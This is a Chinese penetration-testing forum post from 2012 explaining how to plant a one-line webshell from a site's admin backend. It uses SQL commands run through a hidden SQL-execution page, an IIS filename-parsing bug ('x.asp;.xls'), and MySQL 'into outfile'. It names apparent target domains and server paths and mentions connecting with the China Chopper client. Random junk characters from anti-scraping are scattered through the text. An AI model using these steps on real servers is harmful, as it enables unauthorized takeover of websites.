中国网络渗透测试联盟
标题:
ACCESS执行SQL命令导出一句话SHELL
[打印本页]
作者:
admin
时间:
2012-9-13 17:53
标题:
ACCESS执行SQL命令导出一句话SHELL
好不容易进了后台,发现啥上传啊。备份啊多木有。
3 n5 l1 i0 x3 p3 p) {9 E i: ^4 k5 H
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ c j5 K4 S/ R7 l+ p( F3 m* ]
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
+ m* c1 V! U' b# M% E
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
4 w- v% R' h/ C: [% b
1.create table cmd (a varchar(50))
9 E$ ]4 ~. Y: i$ r* b A
2.insert into cmd (a) values (‘‘)
8 m* \9 ^5 d, D* n- m; J
3.select * into [a] in ‘D:\wwwroot\
www.koohik.com
\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
% M# a( [: D3 }4 [' U- C w( d
(把表cmd的内容导出为物理路径的一个EXCEL文件)
, A9 x# `" y' ^
4.drop table cmd
: p; |2 G) r* X- O o$ E0 w
利用IIS的BUG成功拿到了WEBSHELL。
, m; Y3 C) b$ }2 r2 t7 ~# q
: ], l- i6 a# B# ~" e- h# x
直接菜刀里连接
http://www.chouwazi.com/data/xiao.asp;xiao.xls
一句话
1 Q3 f' ~0 R1 G( b
" m' [- I6 J, o8 m5 C
SQL语句意思解释:
0 D+ G9 O m* e( e/ K: W
第一句
g+ }# E4 y4 H; g
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
v% R/ ^6 @* c( O5 \) @- Y! y
& A' i5 Z' h$ I
第二句
* n& ~5 e+ k0 a2 c3 B- m( o# W p
在表cmd的a字段插入一句话木马
5 h* X9 Z) p5 v) D! a9 |8 |
第三句
! I/ Z! B! b& K& v2 V5 J4 Y0 \
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
1 ~4 h/ o. |) w- R: X, [
, O7 d, @4 z" O2 c
第四句
; d8 Q% \% j/ E+ o% T! o
删除建立的cmd表
! B6 L' z. v, ]3 V# o" L
' \5 l+ y) k+ d/ P
以下内容为测试:
9 L8 \) e* ]& k" H% _
Access利用后台SQL执行命令功能导出WebShell:
! M5 X, p7 ^6 _- c2 f b" f H9 J
这个更简单:
3 J; Y9 C: {( T, h! m {7 D! K9 L
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
! O2 n( t- v% d! \, q
或者
8 q! A, e$ Y* r
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
+ X: _& k1 m2 ?% ]
* j; |; i$ z1 X: s6 S' V
后台有执行SQL语句功能(vote为已知表段)
$ U) S( D. ?& O
希望对大家有所帮助拿shell的又一个思路
8 \- x7 z u) I
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2